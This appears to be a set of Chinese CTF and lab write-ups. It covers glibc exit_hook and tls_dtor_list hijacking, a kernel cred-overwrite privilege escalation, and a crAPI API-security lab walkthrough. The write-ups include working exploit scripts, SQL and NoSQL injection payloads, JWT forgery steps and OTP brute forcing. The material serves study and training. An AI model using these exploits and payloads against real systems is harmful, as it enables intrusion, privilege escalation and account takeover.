蚁景网安 - 网络安全人才培养服务提供商

内存利用：迟来的blindless与逃不掉的exit漏洞

0x01 前言在计算机安全领域，漏洞的危险性往往与其广泛性和潜在攻击方式密切相关。今天，我们将深入探讨一个异常危险的漏洞，它存在于程序退出时执行的常见函数"exit"中。无论是在操作系统还是应用程序中，"exit"都是一个普遍存在的函数，通常用于正常退出程序。但这种普遍性也使得它成为了潜在的攻击目标。这个漏洞的威胁性在于，它不仅存在于各种程序中，而且有多种潜在的攻击方式。攻击者可以通过利用这一漏洞来执行恶意代码，获取系统权限，或者实施其他恶意行为。要理解这个漏洞的威胁，我们需要深入分析其背后的原理以及不同的利用方式。在本文中，我们将探讨这个漏洞的具体情况，并详细分析了两种主要的利用方式：一种是将程序流转向libc库中的函数，另一种是将程序流转向程序本身的代码段。我们将深入研究这两种攻击方式的原理，并展示了一个实际漏洞利用的示例。 "blindless"是来自WMCTF 2023比赛的一个题目，虽然难度不高，但要深入理解并利用其中的漏洞，需要花费大量时间。本文总结了有关"exit_hook2libc"和"exit_hook2elf"的利用方法，旨在分享给大家学习。这题的关键是深入理解程序退出时执行的"exit"函数，以及如何通过不同方式实现漏洞利用。 0x02 exit_hook的n种姿势基地址放在此处供各位参考一下，用于计算指令偏移。 exit_hook2libc 首先是p &_rtld_global（看地址），他有一个rtld_lock_default_lock_recursive和rtld_lock_default_unlock_recursive的元素可以改来调用。注意一定要用docker或者虚拟机，否则没有符号表会特别坐牢！执行p _rtld_global。看到那两个rtld_lock_default_lock_recursive和rtld_lock_default_unlock_recursive吗，就是他们两个。我们可以修改他们的内容，从而作为exithook进行调用（直接call）。把后面的东西复制过来p &xxx就可以查看其地址了。注意看，这个程序叫小帅，他调用的第一个参数就是rdi，是_rtld_global+2312，我们可以控制他的参数为/bin/sh\x00然后做坏坏的事情（如果能把rtld_lock_default_lock_recursive也改成system的话）。然后rtld_lock_default_unlock_recursive的参数也是2312这个偏移。注意这个2312是十进制。好的，我们就修改这两个地方就可以为所欲为了，但是exit_hook到这里还没完。并且严格来说，这里并不是完全的exit_hook2libc，如果知道elf的地址也完全可以返回到elf上的函数。接下来还有更骚的，可以控制到程序上的地址（直接跳转，或者间接取地址跳转。） exit_hook2elf 1.间接call 这个在这里，第一个是间接call，即指令是call qword ptr [寄存器]，意思就是从寄存器的地址指向的内存里取地址，然后call。对于间接call的利用，我们可以修改他的偏移到任意函数got表，然后配合参数rdi_rtld_global+2312使用。例如修改_rtld_global+2312为"/bin/sh\x00" 这个的基地址和偏移是存在于link_map的，这样可以找到他的地址。调试可以看到他会从这个地址的内存中取elf基地址，然后通过link_map地址+0x110存的地址取偏移。我们可以改基地址也可以选择改偏移。link_map地址+0x110是存第一个间接call的偏移的。注意存的是偏移-8的地址，也就是如果要改的话要改成目标-8。 2.直接call link_map地址+0xa8是存第二个直接call的偏移注意存的是偏移-8的地址，也就是如果要改的话要改成目标-8。如果改偏移的话能改最好，还能直接形成调用链子。但是如果没有偏移，就只能改基地址了——也就是p &l出来那儿。但是这样肯定会损坏第一次call r14的，会导致无法正常进行。但是发现有一个地方判断可以跳过call r14。就是这里，test edx,edx是edx和edx相互and，留下标志位。简单来说就是如果是0，那么不跳转。如果是1，那么跳转。在x86汇编中，je 指令的作用是：检查零标志位（ZF）是否被设置为 1。如果零标志位被设置为 1，将进行跳转到指定的目标位置。回溯发现是从link_map+0x120取来的地址，也就是说想要这里为0，就把那里的地址指向为0的地方即可！不过也要注意，这里取的是地址+8，也就是我们要改成目标地址-8改进去。这里直接找bss段之类的即可。完成这个操作，就可以修改基地址达到任意直接call的效果了！即使没有泄露，也可直接返回到程序上（比如此题有后门）。如果有，那就是为所欲为！（和前面一样，如果有泄露真的就是为所欲为了）。 0x03 exp 那么本题目由于有brainfuck函数可以执行任意地址写，则根据前面的exit_hook可以做到提权。 from pwn import * n2b = lambda x : str(x).encode() rv = lambda x : p.recv(x) rl = lambda :p.recvline() ru = lambda s : p.recvuntil(s) sd = lambda s : p.send(s) sl = lambda s : p.sendline(s) sn = lambda s : sl(n2b(n)) sa = lambda t, s : p.sendafter(t, s) sla = lambda t, s : p.sendlineafter(t, s) sna = lambda t, n : sla(t, n2b(n)) ia = lambda : p.interactive() rop = lambda r : flat([p64(x) for x in r]) uu64=lambda data :u64(data.ljust(8,b'\x00')) while True: context(os='linux', arch='amd64', log_level='debug') p = process('./main') context.terminal = ['tmux','new-window' ,'-n','-c'] #gdb.attach(p) sla('ze',b'-10')#分配到libc上（用mmap） sla('ze',b'256') pay = b'@'+p32(2148618432)#到ld的地址+0x2f190的偏移 pay += b'@'+p32(2148618432) pay +=b'.' + b'\xb1' pay += b'>.' + b'\x7c'#使得加了偏移之后是后门函数地址 pay += b'@'+p32(0x11f)#修改0x120的地址，指向0，跳过call r14 pay +=b'.' + b'\x00' pay += b'q' sla('code\n',pay) re = p.recvrepeat(0.1)#一直接收直到有回显 #如果是system的话可以发一个cat flag再这样 #这是个很好的爆破方式，学习学习 if re: print('pwned!get your flag here:',re) exit(0) p.close()

通过篡改cred结构体实现提权利用

前言在之前的HeapOverflow文章中，作者还构造了任意地址读写的操作，使用了任意地址读写去进行提权，还挺有意思的，记录一下如何利用任意地址读写进行提权。作者利用任意地址读写分别改写https://h0pe-ay.github.io/%E5%88%A9%E7%94%A8modprobe_path%E6%8F%90%E6%9D%83/以及cred结构体去实现提权的操作，由于改写modprobe_path的方法之前已经研究过了，因此现在详细记录一下如何修改cred结构体完成提权操作。 cred结构体 cred 结构体通常出现在UNIX/Linux操作系统内核中，用于表示进程的凭据（credentials）。这些凭据包括有关进程身份的信息，如用户ID、组ID、权限等。结构体部分成员如下 struct cred { atomic_t usage; #ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; /* number of processes subscribed */ void *put_addr; unsigned magic; #define CRED_MAGIC 0x43736564 #define CRED_MAGIC_DEAD 0x44656144 #endif kuid_t uid; /* real UID of the task */ kgid_t gid; /* real GID of the task */ kuid_t suid; /* saved UID of the task */ kgid_t sgid; /* saved GID of the task */ kuid_t euid; /* effective UID of the task */ kgid_t egid; /* effective GID of the task */ kuid_t fsuid; /* UID for VFS ops */ kgid_t fsgid; /* GID for VFS ops */ ... } __randomize_layout; 而我们在ret2usr的操作中，通常都为执行commit_creds(prepare_kernel_cred(0))，实际就是为了获取root的凭证，因此如果我们能过任意地址写的操作修改cred的结构体也同样能够实现。在cred的结构体存在uid、gid等标识符用于标识在系统中用于身份验证和权限控制，因此将这些标识符修改为0，即可将当前进程修改为root进程。那么该如何获取cred结构体的地址，则是提权的关键。这里就需要凭借任意地址读的操作。在task_struct中存在着cred结构体的指针值。并且该指针值刚好存在于comm变量的上方，而该变量用于存储当前的进程名。 /* Effective (overridable) subjective task credentials (COW): */ const struct cred __rcu *cred; #ifdef CONFIG_KEYS /* Cached requested key. */ struct key *cached_requested_key; #endif /* * executable name, excluding path. * * - normally initialized setup_new_exec() * - access it with [gs]et_task_comm() * - lock it with task_lock() */ char comm[TASK_COMM_LEN]; 因此我们可以通过将当前的进程名设置为在内核地址中几乎不会出现的值，则可以搜索内存值找到comm变量的位置，那么就可以获取cred结构体的指针值。这里使用prctl函数设置进程名，prctl 函数是一个用于进程控制的系统调用，通常在Linux系统上可用。它允许你以不同的方式控制和查询进程的各种属性和行为。 prctl 函数的原型如下： #include <sys/prctl.h> int prctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5); prctl 函数是一个用于进程控制的系统调用，通常在Linux系统上可用。它允许你以不同的方式控制和查询进程的各种属性和行为。 prctl 函数的参数和行为取决于传递给它的 option 参数，以及可能的附加参数 arg2 到 arg5。不同的 option 值对应于不同的控制操作。以下是一些常见的 option 值和它们的用途： PR_SET_NAME：设置进程的名称，可以用于在系统中标识进程。 PR_GET_NAME：获取进程的名称。 PR_SET_PDEATHSIG：设置父进程退出时发送给子进程的信号。 PR_GET_PDEATHSIG：获取父进程退出时发送给子进程的信号。 PR_SET_SECCOMP：启用或禁用Seccomp过滤器，用于限制进程对系统调用的访问。 PR_SET_KEEPCAPS：控制进程是否保留其有效用户ID的能力。 PR_GET_KEEPCAPS：获取进程是否保留其有效用户ID的能力。 PR_SET_NO_NEW_PRIVS：设置进程的No New Privileges标志，用于控制是否可以提升权限。 PR_GET_NO_NEW_PRIVS：获取进程的No New Privileges标志状态。 PR_SET_DUMPABLE：设置进程的核心转储状态。 PR_GET_DUMPABLE：获取进程的核心转储状态。 PR_SET_CHILD_SUBREAPER：设置进程是否作为子进程的子进程的领导者。 PR_GET_CHILD_SUBREAPER：获取进程是否作为子进程的子进程的领导者。 ptrctl(PR_SET_NAME, "XXXXXXXXX"); //设置进程名那么利用cred结构体的提权流程如下：具有任意地址读写的操作使用prctl函数将进程名设置为关键字使用任意地址在内核内存中搜索关键字，获取cred结构体的地址使用任意地址写修改cred结构体标识符的值，全修改为0 LK01-2 项目地址：https://github.com/h0pe-ay/Kernel-Pwn/tree/master/LK01-2/LK01-2/qemu/AAR&AAW& 题目的读写模块存在着堆溢出的漏洞，那么想要使用cred结构体进行提权，首先需要构造出任意地址读写的操作。 ... *(unsigned long *)&buf[0x418] = g_buf; p[0xc] = 0xaaaaaa; write(fd, buf, 0x500); for (int i = 0; i < 100; i++) ioctl(spray[i], 0x1234, 0x5678); ... 正如之前所说的，ioctl的参数是会传递给寄存器的，可以看到ioctl函数的参数对应RCX与RSI寄存器，而第三个参数对应于RDX寄存器。并且距离g_buf地址的0xc的位置可以劫持程序的流程。那么在内核中搜索相关的gadget就可以构造出任意地址读写的操作。任意地址读这里需要注意的是ioctl函数的参数的字节长度是不同的，在执行ioctl(spray[i], 0x1122334455667788, 0x1122334455667788)时，我们同时往参数二与参数三写入0x1122334455667788的值，但是RCX寄存器值传入了4个字节，而RDX寄存器可以传入8个字节，因此我们需要将RDX寄存器作为地址，而RCX作为值，这是因为内核地址是占满八字节的。搜索的表达式为cat g | grep "mov .* \[rdx\];"，由于需要rdx作为地址，因此直接搜索以rdx作为间接寻址的操作，括号需要进行转义字符。这里我们选取0xffffffff8118a285: mov eax, dword ptr [rdx]; ret;作为任意地址读的gadget，这是因为我们可以往rdx填入想要读取的地址并且eax通常用于存储返回值，因此直接读取返回值即可获得rdx指向的值。为了加速读取，作者这里采用缓存的形式，将能够控制的tty结构体的文件描述符存储起来，这样在下次读取时就不用重新遍历一遍。 //0xffffffff8118a285: mov eax, dword ptr [rdx]; ret; int aar(unsigned long addr) { int result; *(unsigned long *)&buf[0x418] = g_buf; p[0xc] = kernel_base + op_aar; write(fd, buf, 0x500); if (cache_fd == -1) { for (int i = 0; i < 100; i++) { result = ioctl(spray[i], 0, addr); if (result != -1) { cache_fd = spray[i]; return result; } } } else return(result = ioctl(cache_fd, 0, addr)); } 任意地址写任意地址写的gadget搜索思路与任意地址读一致，同样是将rdx作为寻址的寄存器，并且由于需要构造任意地址写，因此rcx寄存器则是我们想写入的值，因此搜索的表达式为cat g | grep "mov .* \[rdx\], rcx;" //0xffffffff810477f7: mov qword ptr [rdx], rcx; ret; void aaw(unsigned long target_addr, unsigned long data) { *(unsigned long *)&buf[0x418] = g_buf; p[0xc] = kernel_base + op_aaw; write(fd, buf, 0x500); for (int i = 0; i < 100; i++) { ioctl(spray[i], target_addr, data); } } cred结构体的搜索与改写首先是将当前进程名设置为一个关键字 prctl(PR_SET_NAME, "h0pe-ay!"); 然后就是在内存中搜索该关键字，由于task_struct结构体存在于堆地址中，因此可以在堆地址中搜索。我们可以通过泄露的g_buf的地址，然后往前搜索，因为cred结构体会先于g_buf创建。这里需要注意的是需要将进程名改为小端，这里记录一下python从字符串转为16进制的脚本，因为每次都忘记了。 #从字符串转化为十六进制>>> text = "h0pe-ay!">>> hex_string = text.encode('utf-8').hex()>>> print(hex_string)683070652d617921#从十六进制转化为16进制hex_string = "65703068"bytes_obj = bytes.fromhex(hex_string)print(bytes_obj) 接下来就是搜索内存了,需要注意以下几点使用小端序进行比较需要从g_buf地址往前搜索由于每次只能泄露4字节数据，因此需要泄露两次在成功搜索到关键字之后，comm的上方四字节则是用于存储cred结构体的指针，因此需要通过任意地址去读取指针值，同样的由于只能读取四字节，因此需要读取两次，然后使用简单的移位组合起来。 for (unsigned long addr = g_buf - 0x1000000;; addr += 0x8) { if (aar(addr) == 0x65703068 && aar(addr+4) == 0x2179612d) { printf("[+] found!\n"); printf("addr:0x%lx\n", addr); cred_addr = aar(addr - 4); cred_addr = (cred_addr << 32) | aar(addr - 8); printf("cred_addr:0x%lx\n", cred_addr); break; } } 最后就是改写cred结构体了，只需要将所有标识符修改为0即可,接着拿shell即可 for (int i = 1; i < 9; i++) aaw(0, cred_addr + i*4); 完整exp可见https://github.com/h0pe-ay/Kernel-Pwn/blob/master/LK01-2/LK01-2/qemu/AAR&AAW/exp.c&

Linux内核之堆溢出的利用

crAPI靶场学习记录

靶场搭建 https://github.com/C2yb8er/crAPIlabs(我fork了一份) docker安装，笔者是用的wsl+docker. [lab0:初始账户 ] 注册一个账户，邮箱为mailto:API@qq.com，密码为Admin@123 登陆后访问对应IP的8025端口，接收邮件获取车辆信息。 [lab1:访问其它用户车辆的详细信息 ] 登录后首先找到泄露其它用户的车辆id的接口。进入论坛主页点击某一个论坛文章发现此时的URL为：于是试着抓一下包，看能返回什么，可以看到已经返回了该用户的隐私信息：进一步我们猜测一下直接抓论坛首页试试：在这里我们就得到了demo用户的vehicleid 信息要查车辆信息，现在我们只有Dashboard页面存在车辆信息，我们尝试抓包这个页面,抓了下首页发现是应该根据我们当前用户的Cookie来返回的，我们再找找有没有其他地方：我们将其替换为demo用户的vehicleid 信息54e7994a-e14e-4ee6-a46d-235ca3fd0eed [lab2:访问其它用户的机械报告 ] 在提交的Json数据中发现危险数据： [lab3: 重置其它用户的密码 ] 退出登录，点击忘记密码，输入<mailto:API@qq.com，点击Sent OTP，在后台查看验证码只有四位，于是准备爆破填写表单，密码修改为Admin@456 ，提交抓包查看：多交几次看看有没有限制爆破：由于是API的靶场，我们试试换个API的版本试试：开始着手爆破，选择狙击手模式即可，导入我们从0到9999的字典开始爆破：可以看到原来的密码已经不能登录了： [lab4: 找到泄露其它用户敏感信息的API接口 ] 同lab1中的论坛页面信息泄露 [lab5: 找到泄露视频内部属性的API接口 ] 感觉这个接口比较鸡肋懒得按这个按钮才弹出的上传视频选项，于是我选择修改前端删掉hidden部分就可以： lab6: 使用 "contact mechanic"功能完成第7[层DoS] 在提交的Json数据中发现危险数据：我们尝试修改，再重新提交： [lab7:删除另一个用户的视频 ] 这个API危害挺大还是lab5处的抓包，我们修改一下协议，把PUT修改为OPTIONS HTTP中的OPTIONS方法是一种用于获取目标资源所支持的HTTP方法列表的请求方法。它允许客户端向服务器查询对特定资源所支持的请求方法，以确定在不实际发送请求的情况下，可以对该资源执行哪些操作。 OPTIONS请求的主要用途包括： CORS（跨域资源共享）：在进行跨域请求时，浏览器会首先发送一个OPTIONS请求，以确定服务器是否允许发送实际的跨域请求。服务器可以通过返回特定的响应头（如Access-Control-Allow-Methods）来指示允许的请求方法。服务器功能查询：客户端可以使用OPTIONS请求向服务器查询特定资源支持的HTTP方法列表。这对于动态确定可以执行的操作非常有用，可以根据服务器返回的允许的方法列表来自适应地构建请求。 API文档和发现：OPTIONS方法还可以用于提供API文档和服务发现功能。通过在OPTIONS响应中包含有关资源的元数据，例如支持的方法、请求头等信息，客户端可以获得有关API的更多信息，以便正确使用和调用API。 GET：用于从服务器获取资源。客户端发送一个GET请求来获取指定URI的资源。GET请求是幂等的，即多次发送相同的GET请求应该返回相同的响应。 POST：用于向服务器提交数据，创建新资源或触发服务器的处理操作。POST请求将数据作为请求体发送给服务器，通常用于提交表单数据、上传文件等。 PUT：用于向服务器更新或替换资源。PUT请求将请求体中的数据保存到服务器上指定的URI位置。如果URI不存在，则可以创建新资源；如果URI已存在，则将其替换为请求的内容。 DELETE：用于删除服务器上的资源。DELETE请求用于删除指定URI的资源。 OPTIONS：用于获取目标资源所支持的HTTP方法列表。OPTIONS请求允许客户端查询服务器对特定资源支持的请求方法，以确定可以对该资源执行哪些操作。 HEAD：与GET方法类似，但不返回响应体，仅返回响应头。HEAD请求用于获取关于资源的元数据，例如响应头中的信息，而无需传输整个响应体。 PATCH：用于对服务器上的资源进行局部更新。PATCH请求仅对资源进行部分修改，而不是替换整个资源。除了上述方法外，HTTP/1.1 规范还定义了其他一些请求方法，如： TRACE：用于在请求往返的路径上执行一个追踪。它通常用于诊断和调试，以确定请求如何通过代理服务器和中间节点传输。 CONNECT：用于建立与目标主机的隧道连接，通常用于通过代理服务器建立安全的HTTPS连接。权限不足说明需要用admin的身份：后续通过修改videos/ 后的ID可以实现任意视频的删除 [lab8: 免费获得一件物品 ] 点击后抓包：修改请求方式为GET：我们可以敏锐地观察到返回的Json数据中有一个status数据，明显表示着已经订购的信息。回到购买界面，我们看到还有Return按钮，我们点击后抓包看看：直接切换成GET请求爆出了无权使用的消息，不慌张我们试试尝试着先把这个货品退回再用之前的方式利用 order_id进行查看，发现状态确实发生了改变。这里我们大胆猜想退回的状态就是returned进行修改试试，注意由于status是原来就有的数据，所以这里我们需要用PUT协议进行提交而不是POST协议： PUT和POST是HTTP请求方法，用于向服务器提交数据。它们在语义和使用场景上有以下区别：目的：POST用于向服务器提交数据，请求服务器对数据进行处理。通常用于创建新资源、提交表单数据、发送评论等。PUT用于向服务器更新或替换指定URI的资源。如果URI不存在，则可以创建新资源；如果URI已存在，则将其替换为请求的内容。幂等性：POST请求不是幂等的，即多次发送相同的POST请求可能会产生不同的结果。每次发送POST请求，服务器可能会创建新的资源、执行不同的操作或返回不同的响应。PUT请求是幂等的，即多次发送相同的PUT请求应该产生相同的结果。每次发送PUT请求，服务器应该将请求的内容保存在指定的URI位置，因此多次请求会更新或替换相同的资源。数据位置：POST请求将数据包含在请求体中发送给服务器。数据的格式可以是表单数据、JSON、XML等。PUT请求也将数据包含在请求体中，但是它通常用于指定URI位置的资源，并将请求的内容保存在该位置。资源标识：POST请求通常由服务器决定资源的标识，并返回新资源的标识符（如生成的ID）。 PUT请求通常由客户端指定资源的标识，即URI中的位置。总结来说，POST用于提交数据进行处理，通常用于创建新资源或执行操作，而PUT用于更新或替换指定URI的资源。POST请求不是幂等的，而PUT请求是幂等的。根据具体的应用场景和资源操作需求，选择适当的请求方法来进行数据提交和资源更新。从返回的数据可以看到已经修改成功了，也就是说我们空少套白狼了4个椅子 [lab9:将您的结余增加1000元或以上 ] 同样地利用上面的API，因为我们发现数据不仅可以提交status还可以提交quantity。先将quantity改为100，status改为delivered，这样我们就可以不花钱就点了100个价值10元的椅子然后修改状态为returned，就可以退钱！！！🤑 [lab10: 更新内部视频属性 ] 同lab5的抓包，我们可以看到返回的Json数据有如下几种：所以我们需要更改的话就使用PUT协议，在请求的Json数据中指定就好。 http://www.baidu.com/同lab2接口与抓包，抓包后我们在请求信息中发现了关键信息：为了验证这个猜想，我们使用DNSlog进行验证，使用工具：https://dig.pm/ DNSlog是一种用于收集和分析DNS查询的日志的技术和工具。在网络通信中，DNS（DomainNameSystem）用于将域名解析为对应的IP地址。DNSlog通过设置恶意DNS服务器或域名来截获应用程序或系统发出的DNS查询请求，并将查询信息记录到日志中。 DNSlog注入是一种利用应用程序对DNS查询结果的处理不当而导致的安全漏洞。它通常发生在应用程序通过DNS查询获取动态资源时，没有对返回的DNS响应进行充分的验证和过滤。攻击者可以通过构造恶意的DNS查询请求，将恶意内容注入到应用程序的响应中，从而实现攻击目的。复制subdomain并加上http://后替换mechanic_api的值 lab12: 想办法在不知道优惠券代码的情况下获[得免费优惠券] 先找到输出优惠卷代码的接口，进行抓包查看数据：查了一下文档，考点是NoSQL Injection，之前都学的是SQL注入基于MySQL的这里来个NoSQL给我整不会了，先学一下NoSQL的基本知识： NoSQL注入（NoSQLInjection）是一种攻击技术，针对使用NoSQL数据库的应用程序而言，类似于传统SQL注入攻击。NoSQL注入利用了应用程序对用户输入数据的处理不当，以执行未授权的操作或绕过访问控制。 NoSQL数据库与传统关系型数据库不同，其查询语言和数据存储机制也不同。然而，一些NoSQL数据库仍然需要处理用户提供的数据，如查询参数、过滤条件等。如果应用程序没有正确验证和过滤这些用户输入数据，就可能存在NoSQL注入漏洞。 NoSQL注入攻击的原理是攻击者通过在应用程序发送给NoSQL数据库的查询中注入恶意的数据，以干扰查询的逻辑。攻击者可以利用以下方法进行注入攻击：注入查询语句：攻击者通过在查询中注入恶意操作符、查询语句或特殊字符，来修改查询的逻辑，获取敏感数据或执行未授权的操作。绕过访问控制：攻击者可以通过注入特定的查询条件来绕过应用程序的访问控制机制，获取未授权的数据或执行特权操作。盲注入：在一些情况下，应用程序可能没有直接将查询结果返回给用户，而是根据查询的结果来进行后续操作。攻击者可以通过注入特定的查询条件，观察应用程序的行为差异，从而推断出查询的结果或执行特定操作。 NoSQL（Not OnlySQL）是一类非关系型数据库，与传统的关系型数据库（如MySQL、Oracle）相对应。NoSQL数据库设计的初衷是解决关系型数据库在大规模数据存储和高并发访问方面的局限性。 NoSQL数据库采用了不同的数据模型和存储机制，以满足特定的应用需求。与传统关系型数据库使用表格结构和SQL查询语言不同，NoSQL数据库通常采用以下数据模型之一：键值存储（Key-ValueStores）：使用简单的键值对结构存储数据，通过唯一的键来访问数据。例如，Redis、DynamoDB。文档存储（DocumentStores）：以类似JSON或XML的文档格式存储数据，每个文档都有唯一的标识符。例如，MongoDB、CouchDB。列族存储（Column FamilyStores）：将数据组织为列族的形式，每个列族包含不同的列和行。例如，HBase、Cassandra。图形数据库（GraphDatabases）：用于处理图形结构数据，其中节点和边表示实体和它们之间的关系。例如，Neo4j、JanusGraph。 NoSQL数据库具有以下特点和优势：可扩展性：NoSQL数据库通常具有良好的横向扩展性，可以轻松处理大规模数据和高并发访问。灵活的数据模型：NoSQL数据库提供了灵活的数据模型，适应不同类型和结构的数据，无需事先定义严格的表格结构。高性能：由于去除了复杂的关系模型和复杂的查询语言，NoSQL数据库可以实现更高的读写性能。弱一致性：一些NoSQL数据库采用了弱一致性模型，允许数据在不同节点之间存在一定的延迟和不一致性，以提高性能和可用性。分布式架构：NoSQL数据库常用于分布式环境中，数据可以在多个节点上进行分布和复制，提供高可用性和容错性。我们在这里使用了两个数据库软件分别是Postgresdb 和Mongodb，通过我们之前的响应信息的Json格式可以判断。但是这里的Postgresdb常简称为Postgres）是一个开源的关系型数据库管理系统（RDBMS），而不是NoSQL数据库。经过查阅docker的日志，很神奇我并没有使用这个db，可能是我们的模块暂未使用它吧。故我们只需要面对Mongodb进行NoSQL注入就行了原本的Json提交数据是：这表示MongoDB将搜索集合中满足查询条件的文档，并返回结果集中包含"coupon_code"字段值为"1234"的文档。在学习了最基本的NoSQL注入的语句和Mongodb数据的结构后我构造了payload: 1 {"coupon_code": {"$ne": "hacked by c2yb8er"}} 这个查询条件的意思是，查找"coupon_code"字段值不等于hacked by c2yb8er 的文档。其中$ne 操作符表示不等于的意思 https://xz.aliyun.com/t/9908#toc-4lab13: 找到一种通过修改数据库来兑换已经领取的优惠券的方法有点疑惑，实战的时候找不到这种文档怎么办？查看文档发现一个接口/workshop/api/shop/apply_coupon 我很懵逼，为什么我明明用的Mongodb，不应该是NoSQL注入吗？这里为什么来了一个MySQL中的字符型注入？查阅一下相应代码，真相水落石出了！ class ApplyCouponView(APIView): """Apply Coupon View to increase the available credit""" @jwt_auth_required def post(self, request, user=None): """ api for checking if coupon is already claimed if claimed before: returns an error message else: increases the user credit :param request: htt 注入点是这段代码： with connection.cursor() as cursor: cursor.execute("SELECT coupon_code from applied_coupon WHERE user_id = "\ + str(user.id)\ + " AND coupon_code = '"\ + coupon_request_body['coupon_code']\ + "'") 当我传入如下数据后： {"coupon_code":"1'or '1'='1","amount":1} 这里执行的SQL语句就会变成这样： SELECT coupon_code from applied_coupon WHERE user_id = 'My_id' AND coupon_code = '1'or '1'='1' 破案了！我还以为我刚刚学的NoSQL注入白学了！🥺 [lab14: 查找不为用户执行身份验证检查的接口 ] 同lab3中的/workshop/api/mechanic/mechanic_report?report_id=6 同lab8中的/workshop/api/shop/orders/1 [lab15:找到伪造有效 JWT 令牌的方法 ] [JWT Algorithm Confusion Vulnerability] https://auth0.com/docs/secure/tokens/json-web-tokens/json-web-key-sets：Auth0exposes a JWKS endpoint for each tenant, which is found at https://{yourDomain}/.well-known/jwks.json . This endpoint willcontain the JWK used to verify all Auth0-issued JWTs for this tenant. 通过访问http://localhost:8888/.well-known/jwks.json 获取JWT的公钥到 JWT选项卡，点击New RSA Key 复制 JWK key 内容之后再右键我们新建的Key Copy Public Key as Pem 去Decoder选项卡对这个 PEM 密钥进行 Base64 编码，然后复制生成的字符串再次回到Burp 主选项卡栏中的 JWT Editor Keys选项卡，点击New SymmetricKey后Generate,将 k 属性的生成值替换为PEM Base64编码然后在burp的请求中可以发现 json webtoken选项卡,在选择卡左下角处也可以看到对 json web token 的攻击选项。 [Invalid Signature Vulnerability] 我们在访问Dashboard 的时候进行抓包，进入Repeater 中的JSON Web Token页面中：首先我们修改Payload中的sub为其他的账户试试：成功越权访问到其他用户的信息：实际上就是通过修改下图红框内的内容进行的验证：现在我们将Header中的算法改为不启用，点击Attack中的"none" SigningAlgorithm ，发送包后发现我们的验证字段值发生了较大的变化：但是这个只是一个特殊的接口漏洞，在这个接口中可以用这种方式破解JWT进行越权访问，其他接口就不行了： [AddLab1: 增加一个商品 ] 对首页的Shop 进行抓包：查看相应信息发现同时也支持POST协议，把GET改为POST试试：提示缺少三个参数，我们补充好试试：添加成功！ [AddLab2:支付漏洞 ] 同lab8抓包，修改quantity为负数： [总结] 通过本次靶场学习我对API安全有了更深的认识，之前觉得比较抽象。同时也对HTTP中的GET\POST\PUT\DELETE\OPTIONS等协议有了更深刻的理解。同时在分析lab有些题目的时候，我学习了NoSQL注入的方式，对Mongodb这些非关系型数据库有了基本的认识。同时，精进了我对BurpSuite的操作。美中不足的就是我对 JWT相关知识不太熟悉，打完靶场后也没太懂这个东西有什么用处。这是我后面需要进行补充学习的。总的来说，本靶场认真打下来的话，我相信你会对API安全有不一样的认识和理解！

glibc2.35-通过tls_dtor_list劫持exit执行流程

前言 glibc2.35删除了malloc_hook、free_hook以及realloc_hook，通过劫持这三个hook函数执行system已经不可行了。传统堆漏洞利用是利用任意地址写改上上述几个hook从而执行system，在移除之后则需要找到同样只需要修改某个地址值并且能够造成程序流劫持的效果。 __call_tls_dtors 在程序返回时会通过exit函数，exit函数会经历以下调用过程 exit -> __run_exit_handlers -> __call_tls_dtors 而__call_tls_dtors函数中则存在着可以进行劫持的地址，__call_tls_dtors函数的执行如下：判断tls_dtor_list为空不为空则将tls_dtor_list赋值给cur 取出函数指针cur->func 通过PTR_DEMANGLE宏解密指针值执行函数指针 void __call_tls_dtors (void) { while (tls_dtor_list) { struct dtor_list *cur = tls_dtor_list; dtor_func func = cur->func; #ifdef PTR_DEMANGLE PTR_DEMANGLE (func); #endif tls_dtor_list = tls_dtor_list->next; func (cur->obj); atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1); free (cur); } } 通过上述流程可知，若能够劫持tls_dtor_list，则可以将cur->func指向的位置修改为system函数。具体取出tls_dtor_list的汇编语言如下首先取出tls_dtor_list的下标值，即rbx寄存器的值为0xffffffffffffffa8，转换为十进制为-88 而该下标是用fs进行寻址的，然后取出tls_dtor_list的值判断是否为空那么假设已经存在任意地址写的漏洞，并且将tls_dtor_list修改为不是空值，看看后续会进入哪些校验流程首先遇到第一个问题，在后续的流程中需要将tls_dtor_list的内容作为指针值进行索引，因此我们不能够直接将system函数的地址写入tls_dtor_list，而是需要将指向system函数的指针写入。即在堆题中，我们新创建一个堆，并在堆内容写入system函数的地址，然后将堆地址填充到tls_dtor_list中根据上述的方法，我们成功进入后续的流程但是在执行函数执行时，会遇到另一个问题，最后的指针值被修改为乱七八糟的值了。这是因为上述的宏定义PTR_DEMANGLE，需要将函数指针进入一个解密的流程，因此在传递指针值时，需要先传递一个加密后的指针值。解密的流程如下，先将指针循环右移0x11，然后与fs:[0x30]进行异或。循环右移比较好解决，先将指针循环左移即可。但是这个异或值则需要获得fs:[0x30]的值。 0x7ffff7c45d88 <__call_tls_dtors+40> ror rax, 0x11 0x7ffff7c45d8c <__call_tls_dtors+44> xor rax, qword ptr fs:[0x30] 也可以看到这个值是一个八字节的随机值，因此通过爆破获得的可能性不大。那么该攻击方法需要的一个要求就是能够获得该随机值或者能够篡改该值。需要注意点是指针值是先循环右移在异或，因此在加密指针时需要先异或在循环左移。那么解决上述问题之后就能够正确调用地址了，此时就应该考虑该函数指针需要如何传参。可以看到下图，rdi寄存器是通过我们传入的指针值作为基地址进行寻址的，只需要在偏移加8的位置填充/bin/sh的地址值即可。 POC #include <stdio.h> #include <stdlib.h> #include <string.h> unsigned long long rotate_left(unsigned long long value, int left) { return (value << left) | (value >> (sizeof(unsigned long long) * 8 - left)); } int main() { unsigned long long fs_base; unsigned long long index = 0xffffffffffffffa8; unsigned long long tls_dtor_list_addr; unsigned long long random_number; void *system_ptr = (void *)&system; printf("system:%p\n",system_ptr); // 使用汇编嵌入获取FS寄存器的值 asm("mov %%fs:0, %0" : "=r" (fs_base)); printf("Value in FS register: 0x%llx\n", fs_base); tls_dtor_list_addr = fs_base - 88; random_number = *(unsigned long long *)(fs_base + 0x30); char *str_bin_sh = malloc(0x20); strcpy(str_bin_sh,"/bin/sh"); void *ptr = malloc(0x20); *(unsigned long long *)ptr = rotate_left((unsigned long long)system_ptr ^ random_number,0x11); *(unsigned long long *)(ptr + 8) = str_bin_sh; *(unsigned long long *)tls_dtor_list_addr = ptr; return 0; } 